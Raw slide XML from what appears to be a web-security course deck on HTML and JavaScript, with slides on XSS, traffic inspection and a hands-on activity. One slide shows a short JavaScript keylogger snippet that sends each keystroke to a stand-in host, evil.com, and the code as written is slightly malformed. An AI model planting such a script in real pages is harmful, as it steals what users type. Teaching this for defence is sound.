            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="7086600" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Cup of JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CC0848-D00D-4C08-8B62-34CF07104789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="653854"/>
            <a:ext cx="9372600" cy="574694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C4936FD-F5A9-4EC5-9820-EE6374B62B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720625" y="1012954"/>
            <a:ext cx="7702750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// keylogger!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keyup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://evil.com?d=${value}`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      method: GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  })</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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3599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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2667000"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inspecting HTML Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2895161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D3E4-F714-8C42-B5F5-FF60370BB33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web and Security Concerns </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F969D2DF-0B98-9B41-A953-EB7BFF6B5422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770021" y="1251284"/>
            <a:ext cx="7154779" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Task examples that require knowledge of HTML documentation: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>  - Interpreting captures of web traffic, as collected by Wireshark; Snort, and other incident detection systems; firewalls; and others</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>  - Understanding the concept of cross-site scripting vulnerabilities (XSS) attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>  - Identifying cross-site scripting in hands-on web penetration testing scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>  - Understanding browser-based social engineering attacks, such as clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243071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028BFD-AFBF-4EF2-AA2A-EDCADA19AAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this activity, you’ll use inspect HTML, CSS, and JavaScript to better understand how they’re used, and how they can be abused. In particular, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inspect HTML to identify links to resources the browser will request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See an example of how CSS can be used to initiate an HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Study how browsers interpret updates that JavaScript makes to HTML pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use the file provided to you to complete the activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4081C5-5AC8-4193-97CA-7B6CB059A5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Inspecting Web Assets (15 min.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2608094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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
